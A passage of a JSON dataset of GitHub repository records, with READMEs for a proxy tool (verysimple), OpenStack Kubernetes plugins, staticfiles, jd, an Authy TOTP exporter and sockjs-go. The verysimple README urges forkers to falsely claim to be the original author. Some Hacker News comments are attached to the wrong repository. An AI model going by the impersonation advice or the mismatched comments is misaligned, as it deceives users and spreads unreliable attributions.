Improve and implement the vless v1 protocol\n2. Start a verysimple_c project written in C. That is, even if verysimple had no technological innovation at all, its simple structure alone is a technical advantage and can serve as a reference for a lower-level C implementation. I later thought naiveproxy could be added too, but it turned out not to be that simple.\n3. A verysimple_rust project. Ditto.\n4. Improve the tls lazy encrypt technique.\n5. Connection pooling, so that connections to the server can be reused to issue new requests.\n6. A handshake delay-window technique that diverts part of the traffic to be sent over mux, precisely reducing latency, while sporadic connections still use separate channels.\n\n\nFor other development plans, please refer to\nhttps://github.com/e1732a364fed/v2ray_simple/discussions/3\n\n\n\n## Testing\n\nFor functional golang tests, use `go test ./... -count=1`. If you want detailed output of the test process, add the -v parameter.\n\nIntranet test example:\n\nIn the cmd/verysimple folder, open two terminals:\n```\n./verysimple -c ../../examples/quic.client.toml -ll 0\n```\n\n```\n./verysimple -c ../../examples/quic.server.toml -ll 0\n```\n\n
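For readers unfamiliar with `go test`, the following is a hypothetical example of the kind of functional test such a command picks up: it spins up a tiny echo listener standing in for a local component and checks a round trip. The file name, test name and echo helper are made up for illustration and are not part of verysimple's actual test suite.\n\n```go\n// relay_test.go - a hypothetical functional test of the style that\n// `go test ./... -count=1` runs. The echo listener below stands in for a\n// local component under test; it is not part of verysimple's real test suite.\npackage main\n\nimport (\n\t\"io\"\n\t\"net\"\n\t\"testing\"\n)\n\nfunc TestEchoRoundTrip(t *testing.T) {\n\tln, err := net.Listen(\"tcp\", \"127.0.0.1:0\") // random free port\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\tdefer ln.Close()\n\n\t// Tiny echo server.\n\tgo func() {\n\t\tc, err := ln.Accept()\n\t\tif err != nil {\n\t\t\treturn\n\t\t}\n\t\tdefer c.Close()\n\t\tbuf := make([]byte, 4)\n\t\tif _, err := io.ReadFull(c, buf); err == nil {\n\t\t\tc.Write(buf)\n\t\t}\n\t}()\n\n\tc, err := net.Dial(\"tcp\", ln.Addr().String())\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\tdefer c.Close()\n\n\tif _, err := c.Write([]byte(\"ping\")); err != nil {\n\t\tt.Fatal(err)\n\t}\n\tgot := make([]byte, 4)\n\tif _, err := io.ReadFull(c, got); err != nil {\n\t\tt.Fatal(err)\n\t}\n\tif string(got) != \"ping\" {\n\t\tt.Fatalf(\"want ping, got %q\", got)\n\t}\n}\n```\n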
\n\n\n## Speed test\n\nTest environment: an ubuntu virtual machine, using the open-source testing tool\nhttps://github.com/librespeed/speedtest-go\n\nAfter compiling and running it, it listens on port 8989. Note that, as speedtest-go requires, the web/asset folder and a toml configuration file must sit next to the executable; since we compile it inside the project folder, simply moving them to the project root is enough.\n\nThen set up an nginx front end on the intranet, add a self-signed certificate, and configure a reverse proxy:\n`proxy_pass http://127.0.0.1:8989;`\nso that speedtest-go sits behind nginx.\n\nThen run the verysimple client and server at the same time locally, and configure the firefox browser to use the socks5 proxy so that it connects through our verysimple client.\n\nNote that you must visit the speed-test page over https, otherwise the \"splice\" speed you measure is actually just normal tls speed, with no real splice taking place.\n\nVisit https://your-own-ip/example-singleServer-full.html\nNote that your own ip cannot be 127.0.0.1, because the local loopback never goes through the proxy; it must be your LAN ip.\n\n### About readv and speed tests\n\nIf you measure intranet speed as described above, readv may actually slow things down. For details see\nhttps://github.com/e1732a364fed/v2ray_simple/issues/14\n\nIf you notice a slowdown, you may want to turn readv off.\n\n### Results\n\nDownload on the left, upload on the right, in Mbps. The performance of my virtual machine is quite poor, so even the intranet connection speed is low.\n\nHowever, that is precisely what lets us measure the gap between different proxy protocols.\n\nverysimple version v1.0.3\n\n```\n// direct connection\n156,221\n163, 189\n165,226\n162,200\n\n\n//verysimple, vless v0 + tls\n145,219\n152, 189\n140,222\n149, 203\n\n//verysimple, vless v0 + tls + tls lazy encrypt (splice):\n\n161, 191,\n176, 177\n178,258\n159, 157\n```\n\nFor detailed speed measurements, please refer to the other documents docs/speed_macos.md and docs/speed_ubuntu.md.\n\nIn short, verysimple is clearly the absolute king. Lazy is sometimes not stable enough, but I will keep optimizing that.\n\nWhen measuring speed, open as few windows as possible and leave only the browser window in the foreground; redundant windows have been shown to affect the measured rate. Especially in a CPU-bound scenario like this, on a machine with integrated graphics you really need to keep any other pressure on the CPU to a minimum.\n\n## Communication and ideas\n\nThe groups certainly exist, but they are hidden deep in the mountain mist. In fact, any group may be a verysimple group, and any member may be a verysimple author.\n\nIf you really cannot find a group, you might as well create one yourself. I hope everyone can stand up and proudly say \"I am the original author\" and explain their understanding of verysimple's architecture at length. The point is not who the author is: when one author falls, tens of thousands of authors will stand up.\n\nIf the author of this project suddenly stops updating it, anyone is allowed to fork it and take over in the name of the verysimple author: 
just claim that you are the original author, say you forgot your github and mailbox passwords and had to start over, and that will do.\n\ntelegram channel: https://t.me/+r5hKQKYyeuowMTcx\n\n\n# Disclaimer and Acknowledgments\n\n## Disclaimer\n\nMIT license! The author assumes no responsibility. This project is suitable for intranet testing and for reading the code to understand the principles.\n\nIf you use it for any other purpose, we will not help you.\n\nWe only help friends who study the theory.\n\nLikewise, we are not responsible for projects such as v2ray/xray.\n\n\n## Acknowledgments\n\nTo support hysteria's congestion control, brutal.go and pacer.go were copied from pkg/congestion of [hysteria](https://github.com/HyNetwork/hysteria) into our quic folder.\n\nThe client part of the grpcSimple implementation borrows the gun code from clash; that file is separately under the MIT license. (clash's gun is in turn borrowed from Qv2ray's gun.)\n\ntproxy borrows from [this project](https://github.com/LiamHaworth/go-tproxy/) (trojan-go also borrows from it; it has several bugs, which have been fixed in this project).\n\nCode taken from v2ray includes: quic sniffing, geosite file parsing (v2fly/domain-list-community), and the ShakeSizeParser and openAEADHeader functions of vmess.\n\n(The grpc code referenced v2ray but was not copied directly; it was written from scratch. It ends up looking similar mainly because of the nature of protobuf and Google's grpc package: any compatible code will inevitably look much the same.)\n\nThe code referenced above is all under the MIT license.\n\nThe vmess client code comes from [clash](https://github.com/Dreamacro/clash/transport/vmess) under the GPLv3 license; the license file is placed directly under the proxy/vmess/ folder.\n\nThe corresponding server code was derived by working backwards from the vmess client code.\n\nThe tun code comes from [tun2socks](https://github.com/xjasonlyu/tun2socks) under the GPLv3 license. 
The protocol is placed directly under the netLayer/tun folder.\n\n## Stargazers over time\n\n[![Stargazers over time](https://starchart.cc/e1732a364fed/v2ray_simple.svg)](https://starchart.cc/e1732a364fed/v2ray_simple)", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "kubernetes/cloud-provider-openstack", "link": "https://github.com/kubernetes/cloud-provider-openstack", "tags": ["openstack", "kubernetes", "cloud-controller-manager", "csi-plugin", "k8s-sig-cloud-provider", "k8s-sig-storage"], "stars": 503, "description": null, "lang": "Go", "repo_lang": "", "readme": "# Cloud Provider OpenStack\n\nThank you for visiting the `Cloud Provider OpenStack` repository!\n\nThis Repository hosts various plugins relevant to OpenStack and Kubernetes Integration\n\n* [OpenStack Cloud Controller Manager](/docs/openstack-cloud-controller-manager/using-openstack-cloud-controller-manager.md/)\n* [Octavia Ingress Controller](/docs/octavia-ingress-controller/using-octavia-ingress-controller.md/)\n* [Cinder CSI Plugin](/docs/cinder-csi-plugin/using-cinder-csi-plugin.md/)\n* [Keystone Webhook Authentication Authorization](/docs/keystone-auth/using-keystone-webhook-authenticator-and-authorizer.md/)\n* [Client Keystone](/docs/keystone-auth/using-client-keystone-auth.md/)\n* [Manila CSI Plugin](/docs/manila-csi-plugin/using-manila-csi-plugin.md/)\n* [Barbican KMS Plugin](/docs/barbican-kms-plugin/using-barbican-kms-plugin.md/)\n* [Magnum Auto Healer](/docs/magnum-auto-healer/using-magnum-auto-healer.md/)\n\n**NOTE:**\n\n* Cinder Standalone Provisioner, Manila Provisioner and Cinder FlexVolume Driver were removed since release v1.18.0.\n* Version 1.17 was the last release of Manila Provisioner, which is unmaintained from now on. Due to dependency issues, we removed the code from master but it is still accessible in the [release-1.17](https://github.com/kubernetes/cloud-provider-openstack/tree/release-1.17) branch. 
Please consider migrating to Manila CSI Plugin.\n* Start from release v1.26.0, neutron lbaasv1 support is removed and only Octavia is supported.\n\n## Developing\n\nRefer to [Getting Started Guide](/docs/developers-guide.md/) for setting up development environment and contributing.\n\n## Contact\n\nPlease join us on [Kubernetes provider-openstack slack channel](https://kubernetes.slack.com/messages/provider-openstack)\n\nProject Co-Leads:\n* @lxkong - Lingxian Kong\n* @ramineni - Anusha Ramineni\n* @chrigl - Christoph Glaubitz\n* @jichenjc - Chen Ji\n\n## License\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n[http://www.apache.org/licenses/LICENSE-2.0](http://www.apache.org/licenses/LICENSE-2.0)\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "bouk/staticfiles", "link": "https://github.com/bouk/staticfiles", "tags": [], "stars": 502, "description": "staticfiles compiles a directory of files into an embeddable .go file", "lang": "Go", "repo_lang": "", "readme": "# DEPRECATED\n\nGo 1.16 has file embedding built-in, you should use that!\n\n# staticfiles\n\nStaticfiles allows you to embed a directory of files into your Go binary. It is optimized for performance and file size, and automatically compresses everything before embedding it. Here are some of its features:\n\n* Compresses files, to make sure the resulting binary isn't bloated. It only compresses files that are actually smaller when `gzip`ped.\n* Serves files `gzip`ped (while still allowing clients that don't support it to be served).\n* Ignores hidden files (anything that starts with `.`).\n* Fast. The command-line tool reads and compresses files in parallel, and the resulting Go file serves files very quickly, avoiding unnecessary allocations.\n* No built-in development mode, but makes it very easy to implement one (see [local development mode](#local-development-mode)).\n\nIt has some clever tricks, like only compressing a file if it actually makes the binary smaller (PNG files won't be compressed, as they already are and compressing them again will make them bigger).\n\nI recommend creating a separate package inside your project to serve as the container for the embedded files.\n\n## Example\n\nFor an example of how to use the resulting package, check out `example/example.go`. You can also see the API it generates at [godoc.org](https://godoc.org/bou.ke/staticfiles/files).\n\n## Installation\n\nInstall with\n\n```\ngo get bou.ke/staticfiles\n```\n\n## Usage\n\nSimply run the following command (it will create the result directory if it doesn't exist yet):\n\n```\nstaticfiles -o files/files.go static/\n```\n\nI recommend putting it into a `Makefile` as follows:\n\n```\nfiles/files.go: static/*\n\tstaticfiles -o files/files.go static/\n```\n\nThe `staticfiles` command accept the following arguments:\n\n```\n--build-tags string\n Build tags to write to the file\n-o string\n File to write results to. (default \"staticfiles.go\")\n--package string\n Package name of the resulting file. 
Defaults to name of the resulting file directory\n```\n\n## Local development mode\n\nWhile Staticfiles doesn't have a built-in local development mode, it does support build tags which makes implementing one very easy. Simply run `staticfiles` with `--build-tags=\"!dev\"` and add a file in the same directory that implements the same API, but with `//+build dev` at the that and using `http.FileServer` under the hood. You can find an example in `files/files_dev.go`. Once you have that set up you can simply do `go build --tags=\"dev\"` to compile the development version. In the way I set it up, you could even do `go build --tags=\"dev\" -ldflags=\"-X bou.ke/staticfiles/files.staticDir=$(pwd)/static\"` to set the static file directory to a specific path.\n\n## API\n\nThe resulting file will contain the following functions and variables:\n\n### `func ServeHTTP(http.ResponseWriter, *http.Request)`\n\n`ServeHTTP` will attempt to serve an embedded file, responding with gzip compression if the clients supports it and the embedded file is compressed.\n\n### `func Open(name string) (io.ReadCloser, error)`\n\n`Open` allows you to read an embedded file directly. It will return a decompressing `Reader` if the file is embedded in compressed format. You should close the `Reader` after you're done with it.\n\n### `func ModTime(name string) time.Time`\n\n`ModTime` returns the modification time of the original file. This can be useful for caching purposes.\n\n### `NotFound http.Handler`\n\n`NotFound` is used to respond to a request when no file was found that matches the request. It defaults to `http.NotFound`, but can be overwritten.\n\n### `Server http.Handler`\n\n`Server` is simply `ServeHTTP` but wrapped in `http.HandlerFunc` so it can be passed into `net/http` functions directly.\n", "readme_type": "markdown", "hn_comments": "Hi HN, this is a book with some programming exercises that I have been using on my classes so that students can get up-to speed with python.It is quite incomplete and with a lot of errors. Since my available time is short, and I'm not a native english speaker, this is the best result given the time available for it. I plan to include other things and correct the errors eventually.Have you tried https://www.amazon.com/Design-Patterns-Ruby-Russ-Olsen/dp/03...?Awesome! The one thing that turns me off a little is `ModTime`. I generally avoid incorporating modification times into my build (generally I force them to 1970), but a hash for the ETag would be very welcome.It's quite a common use-case to embed binary data into binaries, so I wonder why more languages don't directly support it with some sort of directive in source code.Interestingly the X Window System took the opposite approach for its images. Rather than making C accommodate their images, they made their images accommodate C! https://en.wikipedia.org/wiki/X_BitMap and https://en.wikipedia.org/wiki/X_PixMap are both image formats that consist of C code.One down side of this bundling approach is whenever there is a change in the static files you have to rebuild and restart app server.A friend of mine implemented something similar[1], but as a pre-processor for the source code. I'll be honest, it's very scary code but I thought it was interesting. :P[1]: https://github.com/sysr-q/assetsI'm not sure I understand how using ego ensures that it is fast. 
Could someone ELI5 please?The article doesn't explain why the author didn't contribute to one of the existing solutions to add the only feature they were missing.The better tool I know for this use case is fileb0x[1]. It work for all my needs, has some features that the alternatives lack.[1]: https://github.com/UnnoTed/fileb0x", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "josephburnett/jd", "link": "https://github.com/josephburnett/jd", "tags": ["diff", "json", "patch", "yaml"], "stars": 502, "description": "JSON diff and patch", "lang": "Go", "repo_lang": "", "readme": "[![Go Report Card](https://goreportcard.com/badge/josephburnett/jd)](https://goreportcard.com/report/josephburnett/jd)\n\n# JSON diff and patch\n\n`jd` is a commandline utility and Go library for diffing and patching JSON and YAML values. It supports a native `jd` format (similar to unified format) as well as JSON Merge Patch ([RFC 7386](https://datatracker.ietf.org/doc/html/rfc7386)) and a subset of JSON Patch ([RFC 6902](https://datatracker.ietf.org/doc/html/rfc6902)). Try it out at http://play.jd-tool.io/.\n\n![jd logo](logo_small.png)\n\n## Installation\n\nTo get the `jd` commandline utility:\n* run `brew install jd`, or\n* run `go install github.com/josephburnett/jd@latest`, or\n* visit https://github.com/josephburnett/jd/releases/latest and download the pre-built binary for your architecture/os, or\n* run in a Docker image `jd(){ docker run --rm -i -v $PWD:$PWD -w $PWD josephburnett/jd \"$@\"; }`.\n\nTo use the `jd` web UI:\n* visit http://play.jd-tool.io/, or\n* run `jd -port 8080` and visit http://localhost:8080.\n\n## Command line usage\n\n```\nUsage: jd [OPTION]... FILE1 [FILE2]\nDiff and patch JSON files.\n\nPrints the diff of FILE1 and FILE2 to STDOUT.\nWhen FILE2 is omitted the second input is read from STDIN.\nWhen patching (-p) FILE1 is a diff.\n\nOptions:\n -color Print color diff.\n -p Apply patch FILE1 to FILE2 or STDIN.\n -o=FILE3 Write to FILE3 instead of STDOUT.\n -set Treat arrays as sets.\n -mset Treat arrays as multisets (bags).\n -setkeys Keys to identify set objects\n -yaml Read and write YAML instead of JSON.\n -port=N Serve web UI on port N\n -f=FORMAT Produce diff in FORMAT \"jd\" (default), \"patch\" (RFC 6902) or\n \"merge\" (RFC 7386)\n -t=FORMATS Translate FILE1 between FORMATS. Supported formats are \"jd\",\n \"patch\" (RFC 6902), \"merge\" (RFC 7386), \"json\" and \"yaml\".\n FORMATS are provided as a pair separated by \"2\". 
E.g.\n \"yaml2json\" or \"jd2patch\".\n\nExamples:\n jd a.json b.json\n cat b.json | jd a.json\n jd -o patch a.json b.json; jd patch a.json\n jd -set a.json b.json\n jd -f patch a.json b.json\n jd -f merge a.json b.json\n```\n\n## Library usage\n\nNote: import only release commits (`v1.Y.Z`) because `master` can be unstable.\n\n```Go\nimport (\n\t\"fmt\"\n\tjd \"github.com/josephburnett/jd/lib\"\n)\n\nfunc ExampleJsonNode_Diff() {\n\ta, _ := jd.ReadJsonString(`{\"foo\":\"bar\"}`)\n\tb, _ := jd.ReadJsonString(`{\"foo\":\"baz\"}`)\n\tfmt.Print(a.Diff(b).Render())\n\t// Output:\n\t// @ [\"foo\"]\n\t// - \"bar\"\n\t// + \"baz\"\n}\n\nfunc ExampleJsonNode_Patch() {\n\ta, _ := jd.ReadJsonString(`[\"foo\"]`)\n\tdiff, _ := jd.ReadDiffString(`` +\n\t\t`@ [1]` + \"\\n\" +\n\t\t`+ \"bar\"` + \"\\n\")\n\tb, _ := a.Patch(diff)\n\tfmt.Print(b.Json())\n\t// Output:\n\t// [\"foo\",\"bar\"]\n}\n```\n\n## Diff language\n\n![Railroad diagram of EBNF](/ebnf.png)\n\n- A diff is zero or more sections\n- Sections start with a `@` header and the path to a node\n- A path is a JSON list of zero or more elements accessing collections\n- A JSON number element (e.g. `0`) accesses an array\n- A JSON string element (e.g. `\"foo\"`) accesses an object\n- An empty JSON object element (`{}`) accesses an array as a set or multiset\n- After the path is one or more removals or additions, removals first\n- Removals start with `-` and then the JSON value to be removed\n- Additions start with `+` and then the JSON value to added\n\n### EBNF\n\n```EBNF\nDiff ::= ( '@' '[' ( 'JSON String' | 'JSON Number' | 'Empty JSON Object' )* ']' '\\n' ( ( '-' 'JSON Value' '\\n' )+ | '+' 'JSON Value' '\\n' ) ( '+' 'JSON Value' '\\n' )* )*\n```\n\n### Examples\n\n```DIFF\n@ [\"a\"]\n- 1\n+ 2\n```\n\n```DIFF\n@ [2]\n+ {\"foo\":\"bar\"}\n```\n\n```DIFF\n@ [\"Movies\",67,\"Title\"]\n- \"Dr. Strangelove\"\n+ \"Dr. Evil Love\"\n@ [\"Movies\",67,\"Actors\",\"Dr. 
Strangelove\"]\n- \"Peter Sellers\"\n+ \"Mike Myers\"\n@ [\"Movies\",102]\n+ {\"Title\":\"Austin Powers\",\"Actors\":{\"Austin Powers\":\"Mike Myers\"}}\n```\n\n```DIFF\n@ [\"Movies\",67,\"Tags\",{}]\n- \"Romance\"\n+ \"Action\"\n+ \"Comedy\"\n```\n\n## Cookbook\n\n### Use git diff to produce a structural diff:\n```\ngit difftool -yx jd @ -- foo.json\n@ [\"foo\"]\n- \"bar\"\n+ \"baz\"\n```\n\n### See what changes in a Kubernetes Deployment:\n```\nkubectl get deployment example -oyaml > a.yaml\nkubectl edit deployment example\n# change cpu resource from 100m to 200m\nkubectl get deployment example -oyaml | jd -yaml a.yaml\n```\noutput:\n```diff\n@ [\"metadata\",\"annotations\",\"deployment.kubernetes.io/revision\"]\n- \"2\"\n+ \"3\"\n@ [\"metadata\",\"generation\"]\n- 2\n+ 3\n@ [\"metadata\",\"resourceVersion\"]\n- \"4661\"\n+ \"5179\"\n@ [\"spec\",\"template\",\"spec\",\"containers\",0,\"resources\",\"requests\",\"cpu\"]\n- \"100m\"\n+ \"200m\"\n@ [\"status\",\"conditions\",1,\"lastUpdateTime\"]\n- \"2021-12-23T09:40:39Z\"\n+ \"2021-12-23T09:41:49Z\"\n@ [\"status\",\"conditions\",1,\"message\"]\n- \"ReplicaSet \\\"nginx-deployment-787d795676\\\" has successfully progressed.\"\n+ \"ReplicaSet \\\"nginx-deployment-795c7f5bb\\\" has successfully progressed.\"\n@ [\"status\",\"observedGeneration\"]\n- 2\n+ 3\n```\napply these change to another deployment:\n```\n# edit file \"patch\" to contain only the hunk updating cpu request\nkubectl patch deployment example2 --type json --patch \"$(jd -t jd2patch ~/patch)\"\n```\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "hlandau/service", "link": "https://github.com/hlandau/service", "tags": ["daemonize", "dropping-privileges", "setproctitle"], "stars": 502, "description": ":zap: Easily write daemonizable services in Go", "lang": "Go", "repo_lang": "", "readme": "", "readme_type": "text", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "alexzorin/authy", "link": "https://github.com/alexzorin/authy", "tags": ["authy", "totp", "golang"], "stars": 502, "description": "Go library and program to access your Authy TOTP secrets.", "lang": "Go", "repo_lang": "", "readme": "# authy\n\n\n[![GoDoc](https://godoc.org/github.com/alexzorin/authy?status.svg)](https://godoc.org/github.com/alexzorin/authy)\n\nThis is a Go library that allows you to access your [Authy](https://authy.com) TOTP tokens.\n\nIt was created to facilitate exports of your TOTP database, because Authy do not provide any way to access or port your TOTP tokens to another client.\n\nIt also somewhat documents Authy's protocol/encryption, since public materials on that are somewhat scarce.\n\nPlease be careful. You can get your Authy account suspended very easily by using this package. It does not hide itself or mimic the official clients.\n\n## Applications\n\n### authy-export\nThis program will enrol itself as an additional device on your Authy account and export all of your TOTP tokens in [Key URI Format](https://github.com/google/google-authenticator/wiki/Key-Uri-Format).\n\nIt is also able to save the TOTP database in a JSON file encrypted with your Authy backup password, which can be used for backup purposes, and to read it back in order to decrypt it.\n\n**Installation**\n\nPre-built binaries are available from the [releases page](https://github.com/alexzorin/authy/releases). 
(Windows binaries have been removed because of continual false positive virus complaints, sorry).\n\nAlternatively, it can be compiled from source, which requires [Go 1.12 or newer](https://golang.org/doc/install):\n\n```shell\ngo install github.com/alexzorin/authy/...@latest\n```\n\n**To use it:**\n\n1. Run `authy-export`\n2. The program will prompt you for your phone number country code (e.g. 1 for United States) and your phone number. This is the number that you used to register your Authy account originally.\n3. If the program identifies an existing Authy account, it will send a device registration request using the `push` method. This will send a push notification to your existing Authy apps (be it on Android, iOS, Desktop or Chrome), and you will need to respond that from your other app(s).\n4. If the device registration is successful, the program will save its authentication credential (a random value) to `$HOME/authy-go.json` for further uses. **Make sure to delete this file and de-register the device after you're finished.**\n5. If the program is able to fetch your TOTP encrypted database, it will prompt you for your Authy backup password. This is required to decrypt the TOTP secrets for the next step. \n6. The program will dump all of your TOTP tokens in URI format, which you can use to import to other applications.\n7. Alternatively, you can save the TOTP encrypted database to a file with the `--save` option, and reload it later with the `--load` option in order to decrypt it and dump the tokens.\n\nIf you [notice any missing TOTP tokens](https://github.com/alexzorin/authy/issues/1#issuecomment-516187701), please try toggling \"Authenticator Backups\" in your Authy settings, to force your backup to be resynchronized.\n\n**How do you then import it into another app?**\n\nUp to you, depends on the app. If the app uses QR scanning, you can try stick all the dumped URIs into a file (`tokens`) and then scan each QR code from your terminal, e.g.:\n\n```bash\n#!/usr/bin/env bash\ncat tokens | while IFS= read -r line; do\n clear\n echo -n \"$line\" | qrencode -t UTF8\n read -p $\"Press any key to continue\" key < /dev/tty\ndone\n```\n\n**\"My Twitch (or other site) token is different to the one I see in the Authy app?\"**\n\nThis is expected, depending on what the site is. \n\nIn Authy, there are two types of secrets:\n\n- **Tokens**: You sign up to a website, the website generates a TOTP secret, and you scan it via a QR code (in *any* app, not necessarily Authy). You can export that secret to other TOTP apps and the code will match.\n- **Apps**: The website has exported their TOTP flow to Authy's proprietary service, which requires you to use the Authy app. For sites like Twitch, Authy assigns a unique TOTP secret for every device you use the Authy app on. Each device will produce different 7-digit codes, but they will all work. If you deregister any device from your Authy account, that device's TOTP secrets will be revoked and its 7-digit codes will no longer work.\n\nTwitch (and a handful of other sites) are the latter: Authy Apps.\n\nNow, `authy-export` registers itself as a device on your Authy account. Per the explanation above, that means it is assigned a unique TOTP secret for sites like Twitch, which means it will generate different 7-digit codes to your primary Authy device. 
These codes will work as long as you don't deregister the `authy-export` device from your Authy account.\n\nThis is unfortunate, but the fact is: you cannot fully delete your Authy account if you want to keep using TOTP-based authentication with Twitch. If you do, all of the TOTP secrets will be revoked, and you will locked out of Twitch. It happened to me, and Twitch support chose to not help me out ^_^.\n\n**Batch support**\n\nWhen environment variable named `AUTHY_EXPORT_PASSWORD` exists, `authy-export` does not ask for a password and uses the variable instead. Use with care!\n\n## LICENSE\n\nSee [LICENSE](LICENSE)\n\n## Trademark Legal Notice\n\nAll product names, logos, and brands are property of their respective owners. All company, product and service names used in this website are for identification purposes only. Use of these names, logos, and brands does not imply endorsement\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "igm/sockjs-go", "link": "https://github.com/igm/sockjs-go", "tags": [], "stars": 501, "description": "WebSocket emulation - Go server library", "lang": "Go", "repo_lang": "", "readme": "[![Build Status](https://api.travis-ci.org/igm/sockjs-go.svg?branch=master)](https://travis-ci.org/igm/sockjs-go) \n[![GoDoc](https://godoc.org/github.com/igm/sockjs-go/v3/sockjs?status.svg)](https://pkg.go.dev/github.com/igm/sockjs-go/v3/sockjs?tab=doc) \n[![Coverage Status](https://coveralls.io/repos/github/igm/sockjs-go/badge.svg?branch=master)](https://coveralls.io/github/igm/sockjs-go?branch=master)\n\nWhat is SockJS?\n=\n\nSockJS is a JavaScript library (for browsers) that provides a WebSocket-like\nobject. SockJS gives you a coherent, cross-browser, Javascript API\nwhich creates a low latency, full duplex, cross-domain communication\nchannel between the browser and the web server, with WebSockets or without.\nThis necessitates the use of a server, which this is one version of, for GO.\n\n\nSockJS-Go server library\n=\n\nSockJS-Go is a [SockJS](https://github.com/sockjs/sockjs-client) server library written in Go.\n\nFor latest **v3** version of `sockjs-go` use:\n\n github.com/igm/sockjs-go/v3/sockjs\n\nFor **v2** version of `sockjs-go` use:\n\n gopkg.in/igm/sockjs-go.v2/sockjs\n\nUsing version **v1** is not recommended (DEPRECATED)\n\n gopkg.in/igm/sockjs-go.v1/sockjs\n\nNote: using `github.com/igm/sockjs-go/sockjs` is not recommended. It exists for backwards compatibility reasons and is not maintained. \n\nVersioning\n-\n\nSockJS-Go project adopted [gopkg.in](http://gopkg.in) approach for versioning. SockJS-Go library details can be found [here](https://gopkg.in/igm/sockjs-go.v2/sockjs)\n\nWith the introduction of go modules a new version `v3` is developed and maintained in the `master` and has new import part `github.com/igm/sockjs-go/v3/sockjs`. 
\n\nExample\n-\n\nA simple echo sockjs server:\n\n\n```go\npackage main\n\nimport (\n\t\"log\"\n\t\"net/http\"\n\n\t\"github.com/igm/sockjs-go/v3/sockjs\"\n)\n\nfunc main() {\n\thandler := sockjs.NewHandler(\"/echo\", sockjs.DefaultOptions, echoHandler)\n\tlog.Fatal(http.ListenAndServe(\":8081\", handler))\n}\n\nfunc echoHandler(session sockjs.Session) {\n\tfor {\n\t\tif msg, err := session.Recv(); err == nil {\n\t\t\tsession.Send(msg)\n\t\t\tcontinue\n\t\t}\n\t\tbreak\n\t}\n}\n```\n\n\nSockJS Protocol Tests Status\n-\nSockJS defines a set of [protocol tests](https://github.com/sockjs/sockjs-protocol) to quarantee a server compatibility with sockjs client library and various browsers. SockJS-Go server library aims to provide full compatibility, however there are couple of tests that don't and probably will never pass due to reasons explained in table below:\n\n\n| Failing Test | Explanation |\n| -------------| ------------|\n| **XhrPolling.test_transport** | does not pass due to a feature in net/http that does not send content-type header in case of StatusNoContent response code (even if explicitly set in the code), [details](https://code.google.com/p/go/source/detail?r=902dc062bff8) |\n| **WebSocket.** | Sockjs Go version supports RFC 6455, draft protocols hixie-76, hybi-10 are not supported |\n| **JSONEncoding** | As menioned in [browser quirks](https://github.com/sockjs/sockjs-client#browser-quirks) section: \"it's advisable to use only valid characters. Using invalid characters is a bit slower, and may not work with SockJS servers that have a proper Unicode support.\" Go lang has a proper Unicode support |\n| **RawWebsocket.** | The sockjs protocol tests use old WebSocket client library (hybi-10) that does not support RFC 6455 properly |\n\nWebSocket\n-\nAs mentioned above sockjs-go library is compatible with RFC 6455. That means the browsers not supporting RFC 6455 are not supported properly. There are no plans to support draft versions of WebSocket protocol. The WebSocket support is based on [Gorilla web toolkit](http://www.gorillatoolkit.org/pkg/websocket) implementation of WebSocket.\n\nFor detailed information about browser versions supporting RFC 6455 see this [wiki page](http://en.wikipedia.org/wiki/WebSocket#Browser_support).\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}], "_init_fingerprint": "da39a3ee5e6b4b0d3255bfef95601890afd80709"}